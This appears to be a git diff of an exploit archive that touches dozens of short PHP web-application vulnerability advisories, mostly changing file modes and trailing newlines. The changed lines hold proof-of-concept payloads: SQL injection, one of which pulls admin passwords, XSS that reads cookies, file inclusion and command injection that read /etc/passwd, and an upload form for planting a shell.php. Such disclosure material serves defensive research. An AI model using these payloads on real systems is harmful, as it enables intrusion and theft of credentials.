newline at end of file diff --git a/platforms/php/webapps/36222.txt b/platforms/php/webapps/36222.txt old mode 100755 new mode 100644 index fa680f4f2..0368f6d6c --- a/platforms/php/webapps/36222.txt +++ b/platforms/php/webapps/36222.txt @@ -4,4 +4,4 @@ The 'com_shop' component for Joomla! is prone to an SQL-injection vulnerability Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12 \ No newline at end of file +http://www.example.com/index.php?option=com_shop&view=details&id=-29 union select 0,1,2,version(),4,5,6,7,8,9,10,11,12 \ No newline at end of file diff --git a/platforms/php/webapps/36223.txt b/platforms/php/webapps/36223.txt old mode 100755 new mode 100644 index 115eb80d9..1ed7b53d8 --- a/platforms/php/webapps/36223.txt +++ b/platforms/php/webapps/36223.txt @@ -20,4 +20,4 @@ http://www.example.com/2Moons/includes/pages/ShowTopKB.php?ReportID=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/Smarty.class.php?file=[EV!L] http://www.example.com/2Moons/includes/pages/adm/ShowModVersionPage.php?File=[EV!L] http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_resource_php.php?_smarty_template=[EV!L] -http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?file=[EV!L] \ No newline at end of file +http://www.example.com/2Moons/includes/libs/Smarty/sysplugins/smarty_internal_templatecompilerbase.php?file=[EV!L] \ No newline at end of file diff --git a/platforms/php/webapps/36224.txt b/platforms/php/webapps/36224.txt old mode 100755 new mode 100644 index 9d7908ea9..263d328b3 --- a/platforms/php/webapps/36224.txt +++ b/platforms/php/webapps/36224.txt @@ -12,4 +12,4 @@ http://www.example.com/index.php?'[XSS] http://www.example.com/login.php?'[XSS] http://www.example.com/online.php?'[XSS] http://www.example.com/getfiles.php?f=http://xxx&t=js -http://www.example.com/admin/portalcollect.php?f=http://xxx&t=js \ No newline at end of file +http://www.example.com/admin/portalcollect.php?f=http://xxx&t=js \ No newline at end of file diff --git a/platforms/php/webapps/36225.txt b/platforms/php/webapps/36225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36226.txt b/platforms/php/webapps/36226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36227.txt b/platforms/php/webapps/36227.txt old mode 100755 new mode 100644 index 1b733fe62..554c935ad --- a/platforms/php/webapps/36227.txt +++ b/platforms/php/webapps/36227.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc Sgicatalog 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi] \ No newline at end of file +http://www.example.com/index.php?option=com_sgicatalog&task=view&lang=en&id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36228.txt b/platforms/php/webapps/36228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36230.txt b/platforms/php/webapps/36230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36232.txt b/platforms/php/webapps/36232.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36233.txt b/platforms/php/webapps/36233.txt old mode 100755 new mode 100644 index a8d5ceb13..378e9cad1 --- a/platforms/php/webapps/36233.txt +++ b/platforms/php/webapps/36233.txt @@ -10,4 +10,4 @@ http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-clicks/ http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-dashboard-widget/widget.php?message=%3Cscript% 3Ealert%28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/pretty-link/classes/views/prli-links/form.php?prli_blogurl=%3Cscript%3Ealert% 28document.cookie%29;%3C/script%3E http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/errors.php?errors[]=%3Cscript%3Ealert%28docu ment.cookie%29;%3C/script%3E -http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_re cord=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file +http://www.example.com/wp-content/plugins/pretty-link/classes/views/shared/table-nav.php?page_count=2&page_first_re cord=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/36236.txt b/platforms/php/webapps/36236.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36237.txt b/platforms/php/webapps/36237.txt old mode 100755 new mode 100644 index 7decf01c3..4956577a3 --- a/platforms/php/webapps/36237.txt +++ b/platforms/php/webapps/36237.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary HTML and script code in http://code.google.com/p/asgbookphp/ asgbookphp 1.9 is vulnerable; other versions may also be affected. -http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt> \ No newline at end of file +http://www.example.com/asgbookphp/index.php/>'><ScRiPt>alert(771818860)</ScRiPt> \ No newline at end of file diff --git a/platforms/php/webapps/3624.txt b/platforms/php/webapps/3624.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36240.txt b/platforms/php/webapps/36240.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36242.txt b/platforms/php/webapps/36242.txt old mode 100755 new mode 100644 index 2301a7eb7..bfc4d7aca --- a/platforms/php/webapps/36242.txt +++ b/platforms/php/webapps/36242.txt @@ -23,4 +23,4 @@ Exploit code : http://sitewordpress/wp-content/themes/[photocrati-Path-theme]/ecomm-sizes.php?prod_id=[SQL] greetz to all muslims and all tryag member's -:) from morocco \ No newline at end of file +:) from morocco \ No newline at end of file diff --git a/platforms/php/webapps/36243.txt b/platforms/php/webapps/36243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36244.txt b/platforms/php/webapps/36244.txt old mode 100755 new mode 100644 index 4a080ac38..3c3d28826 --- a/platforms/php/webapps/36244.txt +++ b/platforms/php/webapps/36244.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Boonex Dolphin 6.1 is vulnerable; other versions may also be affected. -http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) ) \ No newline at end of file +http://www.example.com/xml/get_list.php?dataType=ApplyChanges&iNumb=1&iIDcat=(select 1 from AdminMenu where 1=1 group by concat((select password from Admins),rand(0)|0) having min(0) ) \ No newline at end of file diff --git a/platforms/php/webapps/36245.txt b/platforms/php/webapps/36245.txt old mode 100755 new mode 100644 index 5e7d8967e..e3bc01207 --- a/platforms/php/webapps/36245.txt +++ b/platforms/php/webapps/36245.txt @@ -4,4 +4,4 @@ Innovate Portal is prone to a cross-site scripting vulnerability because it fail An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound \ No newline at end of file +http://www.example.com/index.php?cat=%27%22%28%29%26%251%3cScRiPt%20%3eprompt%28948044%29%3c%2fScRiPt%3e&content=error&sid=57cdbb83e0ab1b879e0a0f91fbf22781&what=user_notfound \ No newline at end of file diff --git a/platforms/php/webapps/36248.txt b/platforms/php/webapps/36248.txt old mode 100755 new mode 100644 index 89b4581f3..04305686a --- a/platforms/php/webapps/36248.txt +++ b/platforms/php/webapps/36248.txt @@ -10,4 +10,4 @@ http://www.example.com/admin/shop_file_manager.php/login.php/login.php?action=do The following exploit is available for the remote file upload vulnerability: -<html><head><title> creloaded - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; <input name="submit" type="submit" value=" Save " > </form> \ No newline at end of file +<html><head><title> creloaded - Remote File Upload </title></head> <br><br><u>UPLOAD FILE:</u><br> <form name="file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=processuploads" method="post" enctype="multipart/form-data"> <input type="file" name="file_1"><br> <input name="submit" type="submit" value=" Upload " > </form> <br><u>CREATE FILE:</u><br> <form name="new_file" action="https://www.example.com/admin/shop_file_manager.php/login.php?action=save" method="post"> FILE NAME:<br> <input type="text" name="filename">&nbsp; (ex. shell.php)<br>FILE CONTENTS:<br> <textarea name="file_contents" wrap="soft" cols="70" rows="10">&lt;/textarea&gt; <input name="submit" type="submit" value=" Save " > </form> \ No newline at end of file diff --git a/platforms/php/webapps/36249.txt b/platforms/php/webapps/36249.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36251.txt b/platforms/php/webapps/36251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36252.txt b/platforms/php/webapps/36252.txt old mode 100755 new mode 100644 index 3396862d8..7515def35 --- a/platforms/php/webapps/36252.txt +++ b/platforms/php/webapps/36252.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute arbitrary commands within the cont e107 0.7.24 is vulnerable; other versions may also be affected. -http://www.example.com/e107_config.php?cmd=id \ No newline at end of file +http://www.example.com/e107_config.php?cmd=id \ No newline at end of file diff --git a/platforms/php/webapps/36253.txt b/platforms/php/webapps/36253.txt old mode 100755 new mode 100644 index 047a37e92..b2deb6b36 --- a/platforms/php/webapps/36253.txt +++ b/platforms/php/webapps/36253.txt @@ -10,4 +10,4 @@ http://www.example.com/inver/inverseflow/ticketview.php?email= [XSS] http://www.example.com/inver/inverseflow/ticketview.php?email=&id=[XSS] -http://www.example.com/inver/inverseflow/login.php?redirect=[XSS] \ No newline at end of file +http://www.example.com/inver/inverseflow/login.php?redirect=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36254.txt b/platforms/php/webapps/36254.txt old mode 100755 new mode 100644 index 405998d56..057b78aac --- a/platforms/php/webapps/36254.txt +++ b/platforms/php/webapps/36254.txt @@ -7,4 +7,4 @@ An attacker can exploit this vulnerability to obtain potentially sensitive infor Alsbtain Bulletin 1.5 and 1.6 are vulnerable; other versions may also be affected. http://www.example.com/index.php?style=[LFI]%00 -http://www.example.com/index.php?act=[LFI]%00 \ No newline at end of file +http://www.example.com/index.php?act=[LFI]%00 \ No newline at end of file diff --git a/platforms/php/webapps/36255.txt b/platforms/php/webapps/36255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36259.txt b/platforms/php/webapps/36259.txt old mode 100755 new mode 100644 index 59437a595..a5e736e19 --- a/platforms/php/webapps/36259.txt +++ b/platforms/php/webapps/36259.txt @@ -8,4 +8,4 @@ eFront 3.6.10 is vulnerable; other versions may also be affected. http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=0-- -http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1-- \ No newline at end of file +http://www.example.com/enterprise/www/professor.php?ctg=survey&action=preview&surveys_ID=1+and%201=1-- \ No newline at end of file diff --git a/platforms/php/webapps/36265.txt b/platforms/php/webapps/36265.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36269.txt b/platforms/php/webapps/36269.txt old mode 100755 new mode 100644 index a16ddd911..9afa7b37b --- a/platforms/php/webapps/36269.txt +++ b/platforms/php/webapps/36269.txt @@ -8,4 +8,4 @@ SjXjV 2.3 is vulnerable; other versions may also be affected. http://www.example.com/post.php?fid=41&tid=-51%20union%20select%201,2,3,4,5,6,7,8,group_concat%28table_name%29,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables+where+table_schema%20=database%28%29-- -http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5 \ No newline at end of file +http://www.example.com/post.php?fid=41&tid=51 and substring(@@version,1,1)=5 \ No newline at end of file diff --git a/platforms/php/webapps/36270.txt b/platforms/php/webapps/36270.txt old mode 100755 new mode 100644 index e8cfb85e1..189f79b95 --- a/platforms/php/webapps/36270.txt +++ b/platforms/php/webapps/36270.txt @@ -4,4 +4,4 @@ Plici is prone to a cross-site scripting vulnerability because it fails to suffi An attacker may leverage this issue to execute arbitrary HTML and script code in an unsuspecting user's browser in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/l1/p48-search.html[XSS] \ No newline at end of file +http://www.example.com/l1/p48-search.html[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/36272.txt b/platforms/php/webapps/36272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36273.txt b/platforms/php/webapps/36273.txt old mode 100755 new mode 100644 index c8f2237da..1e60f1801 --- a/platforms/php/webapps/36273.txt +++ b/platforms/php/webapps/36273.txt @@ -20,4 +20,4 @@ http://www.example.com/vB1/includes/functions_cron.php?nextitem[filename]=[RFI] http://www.example.com/vB1/vb/vb.php?filename=[RFI] http://www.example.com/vB1/install/includes/class_upgrade.php?chosenlib=[RFI] http://www.example.com/vB1/packages/vbattach/attach.php?package=[RFI] -http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] \ No newline at end of file +http://www.example.com/vB1/packages/vbattach/attach.php?path=[RFI] \ No newline at end of file diff --git a/platforms/php/webapps/36277.txt b/platforms/php/webapps/36277.txt old mode 100755 new mode 100644 index d4b886eba..3fee7199a --- a/platforms/php/webapps/36277.txt +++ b/platforms/php/webapps/36277.txt @@ -4,4 +4,4 @@ IBSng is prone to a cross-site scripting vulnerability because it fails to prope An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/IBSng/util/show_multistr.php?str=[xss] \ No newline at end of file +http://www.example.com/IBSng/util/show_multistr.php?str=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36278.txt b/platforms/php/webapps/36278.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3628.txt b/platforms/php/webapps/3628.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36280.txt b/platforms/php/webapps/36280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36281.txt b/platforms/php/webapps/36281.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36282.txt b/platforms/php/webapps/36282.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36283.txt b/platforms/php/webapps/36283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36287.txt b/platforms/php/webapps/36287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36289.txt b/platforms/php/webapps/36289.txt old mode 100755 new mode 100644 index 9143aa9f2..f2ad30920 --- a/platforms/php/webapps/36289.txt +++ b/platforms/php/webapps/36289.txt @@ -4,4 +4,4 @@ SmartJobBoard is prone to a cross-site scripting vulnerability because it fails An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E \ No newline at end of file +http://www.example.com/demo/search-results-resumes/?action=search&listing_type[equal]=Resume&keywords[exact_phrase]=%3Cscript%3Ealert%28%22DDz+Mr.PaPaRoSSe%22%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/36290.txt b/platforms/php/webapps/36290.txt old mode 100755 new mode 100644 index 1814c6b2c..c9c2afcbe --- a/platforms/php/webapps/36290.txt +++ b/platforms/php/webapps/36290.txt @@ -4,4 +4,4 @@ Admin Bot is prone to an SQL Injection vulnerability because it fails to suffici Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/news.php?wgo=666+and+1=2+union+all+select+0,1,BALTAZAR,3,4,5,6,7,8-- \ No newline at end of file +http://www.example.com/news.php?wgo=666+and+1=2+union+all+select+0,1,BALTAZAR,3,4,5,6,7,8-- \ No newline at end of file diff --git a/platforms/php/webapps/36293.txt b/platforms/php/webapps/36293.txt old mode 100755 new mode 100644 index 3bbf2636d..d425f0788 --- a/platforms/php/webapps/36293.txt +++ b/platforms/php/webapps/36293.txt @@ -6,4 +6,4 @@ Attackers can exploit this issue to execute arbitrary commands in the context of Centreon 2.3.1 is affected; other versions may also be vulnerable. -http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1 \ No newline at end of file +http://www.example.com/centreon/main.php?p=60706&command_name=/Centreon/SNMP/../../../../bin/cat%20/etc/passwd%20%23&o=h&min=1 \ No newline at end of file diff --git a/platforms/php/webapps/36295.txt b/platforms/php/webapps/36295.txt old mode 100755 new mode 100644 index 3aed95479..ddc72a9e3 --- a/platforms/php/webapps/36295.txt +++ b/platforms/php/webapps/36295.txt @@ -4,4 +4,4 @@ PBCS Technology is prone to an SQL Injection vulnerability because it fails to s Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/articlenav.php?id=[SQLi] \ No newline at end of file +http://www.example.com/articlenav.php?id=[SQLi] \ No newline at end of file diff --git a/platforms/php/webapps/36297.txt b/platforms/php/webapps/36297.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36298.txt b/platforms/php/webapps/36298.txt old mode 100755 new mode 100644 index 4e93af430..5b4c11280 --- a/platforms/php/webapps/36298.txt +++ b/platforms/php/webapps/36298.txt @@ -6,4 +6,4 @@ An attacker could leverage these issues to execute arbitrary script code in the Joomla! 'com_alfcontact' extension 1.9.3 is vulnerable; prior versions may also be affected. -&email=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&emailid=5%2c%2cCareers%20at%20Foreground%20Security&emailto_id=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&extravalue=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&message=20&name=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&option=com_alfcontact&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge&subject=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&task=sendemail \ No newline at end of file +&email=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&emailid=5%2c%2cCareers%20at%20Foreground%20Security&emailto_id=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&extravalue=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&message=20&name=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&option=com_alfcontact&recaptcha_challenge_field=&recaptcha_response_field=manual_challenge&subject=%22%20onmouseover%3dprompt%28document.cookie%29%20%22&task=sendemail \ No newline at end of file diff --git a/platforms/php/webapps/3630.htm b/platforms/php/webapps/3630.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36301.txt b/platforms/php/webapps/36301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36302.txt b/platforms/php/webapps/36302.txt old mode 100755 new mode 100644 index ff662e412..a7dd2f403 --- a/platforms/php/webapps/36302.txt +++ b/platforms/php/webapps/36302.txt @@ -4,4 +4,4 @@ Content component for Joomla! is prone to an SQL-injection vulnerability because Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI] \ No newline at end of file +http://www.example.com/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI] \ No newline at end of file diff --git a/platforms/php/webapps/36303.txt b/platforms/php/webapps/36303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36305.txt b/platforms/php/webapps/36305.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36306.txt b/platforms/php/webapps/36306.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36307.html b/platforms/php/webapps/36307.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36308.txt b/platforms/php/webapps/36308.txt old mode 100755 new mode 100644 index fd2374e9a..7f4046716 --- a/platforms/php/webapps/36308.txt +++ b/platforms/php/webapps/36308.txt @@ -6,4 +6,4 @@ A successful exploit may allow an attacker to compromise the application, access Webistry 1.0 is vulnerable; other versions may also be affected. -http://www.example.com /index.php?pid=14 union select 0,1,2,3,version(),5,6,7 \ No newline at end of file +http://www.example.com /index.php?pid=14 union select 0,1,2,3,version(),5,6,7 \ No newline at end of file diff --git a/platforms/php/webapps/3631.txt b/platforms/php/webapps/3631.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36313.txt b/platforms/php/webapps/36313.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36314.txt b/platforms/php/webapps/36314.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36315.txt b/platforms/php/webapps/36315.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36316.txt b/platforms/php/webapps/36316.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36317.txt b/platforms/php/webapps/36317.txt old mode 100755 new mode 100644 index 7762bd3a1..d6ab7eb07 --- a/platforms/php/webapps/36317.txt +++ b/platforms/php/webapps/36317.txt @@ -4,4 +4,4 @@ Flexible Custom Post Type plugin for WordPress is prone to a cross-site scriptin An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36320.txt b/platforms/php/webapps/36320.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36321.txt b/platforms/php/webapps/36321.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36322.txt b/platforms/php/webapps/36322.txt old mode 100755 new mode 100644 index 0b4a78d19..3c521cc05 --- a/platforms/php/webapps/36322.txt +++ b/platforms/php/webapps/36322.txt @@ -4,4 +4,4 @@ Digital Attic Foundation CMS is prone to an SQL-injection vulnerability because A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. -http://www.example.com/index.php?id=[SQL] \ No newline at end of file +http://www.example.com/index.php?id=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/36323.txt b/platforms/php/webapps/36323.txt old mode 100755 new mode 100644 index 56eca39f3..219b42a36 --- a/platforms/php/webapps/36323.txt +++ b/platforms/php/webapps/36323.txt @@ -4,4 +4,4 @@ Alert Before Your Post plugin for WordPress is prone to a cross-site scripting v An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/[path]/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36324.txt b/platforms/php/webapps/36324.txt old mode 100755 new mode 100644 index 3cd299e76..b07a2ae88 --- a/platforms/php/webapps/36324.txt +++ b/platforms/php/webapps/36324.txt @@ -8,4 +8,4 @@ Advanced Text Widget 2.0.0 is vulnerable; other versions may also be affected. UPDATE Apr 18, 2012: Further reports indicate the issue reported may not be valid. This BID will be updated as more information emerges. -http://www.example.com/[path]/wp-content/plugins/advanced-text-widget/advancedtext.php?page=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/advanced-text-widget/advancedtext.php?page=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36325.txt b/platforms/php/webapps/36325.txt old mode 100755 new mode 100644 index 97a954d26..2cee900ae --- a/platforms/php/webapps/36325.txt +++ b/platforms/php/webapps/36325.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Adminimize 1.7.21 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/wp-content/plugins/adminimize/adminimize_page.php?page=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/adminimize/adminimize_page.php?page=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36326.txt b/platforms/php/webapps/36326.txt old mode 100755 new mode 100644 index c4a293ef8..7b9ed553f --- a/platforms/php/webapps/36326.txt +++ b/platforms/php/webapps/36326.txt @@ -8,4 +8,4 @@ Lanoba Social Plugin 1.0 is vulnerable; other versions may also be affected. UPDATE (Nov 28, 2011): The vendor refutes this issue claiming they are not able to replicate the problem, and all inputs are sanitized. This BID will be updated, and possibly retired pending further information. -http://www.example.com/[path]/wp-content/plugins/lanoba-social-plugin/index.php?action=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/lanoba-social-plugin/index.php?action=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36328.txt b/platforms/php/webapps/36328.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36329.txt b/platforms/php/webapps/36329.txt old mode 100755 new mode 100644 index b0d1121c4..3bca692a1 --- a/platforms/php/webapps/36329.txt +++ b/platforms/php/webapps/36329.txt @@ -4,4 +4,4 @@ TA.CMS is prone to multiple local file-include and SQL-injection vulnerabilities An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver. -http://www.example.com/?lang=../../../../../../../../../../../../../../../etc/passwd%00.png&p_id=60 \ No newline at end of file +http://www.example.com/?lang=../../../../../../../../../../../../../../../etc/passwd%00.png&p_id=60 \ No newline at end of file diff --git a/platforms/php/webapps/3633.htm b/platforms/php/webapps/3633.htm old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36330.txt b/platforms/php/webapps/36330.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36331.txt b/platforms/php/webapps/36331.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36332.txt b/platforms/php/webapps/36332.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36333.txt b/platforms/php/webapps/36333.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36338.txt b/platforms/php/webapps/36338.txt old mode 100755 new mode 100644 index b19a43537..69815dbe9 --- a/platforms/php/webapps/36338.txt +++ b/platforms/php/webapps/36338.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow ClickDesk Live Support 2.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36339.txt b/platforms/php/webapps/36339.txt old mode 100755 new mode 100644 index 127b86dad..e96a2cfbb --- a/platforms/php/webapps/36339.txt +++ b/platforms/php/webapps/36339.txt @@ -8,4 +8,4 @@ Featurific For WordPress 1.6.2 is vulnerable; other versions may also be affecte UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described. -http://www.example.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36340.txt b/platforms/php/webapps/36340.txt old mode 100755 new mode 100644 index ec6fe7256..751477d8e --- a/platforms/php/webapps/36340.txt +++ b/platforms/php/webapps/36340.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Newsletter Meenews 5.1.0 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss] \ No newline at end of file +http://www.example.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/36341.txt b/platforms/php/webapps/36341.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36342.txt b/platforms/php/webapps/36342.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36343.txt b/platforms/php/webapps/36343.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/36344.txt b/platforms/php/webapps/36344.txt old mode 100755 new mode 100644 index 98a5bf0c3..08f94bd4d --- a/platforms/php/webapps/36344.txt +++ b/platforms/php/webapps/36344.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected. GET: http://<app_base>/admin/ajaxfilemanager/ajax_save_text.php -POST: folder=<script>alert(&#039;XSS 1&#039;);</script>&name=<script>alert(&#039;XSS 2&#039;);</script> \ No newline at end of file +POST: folder=<script>alert(&#039;XSS 1&#039;);</script>&name=<script>alert(&#039;XSS 2&#039;);</script> \ No newline at end of file diff --git a/platforms/php/webapps/36345.txt b/platforms/php/webapps/36345.txt old mode 100755 new mode 100644 index 6cafc68db..318cd2afc --- a/platforms/php/webapps/36345.txt +++ b/platforms/php/webapps/36345.txt @@ -7,4 +7,4 @@ Attackers can leverage this issue to influence or misrepresent how web content i Prestashop 1 4.4.1 is vulnerable; other versions may also be affected. GET: 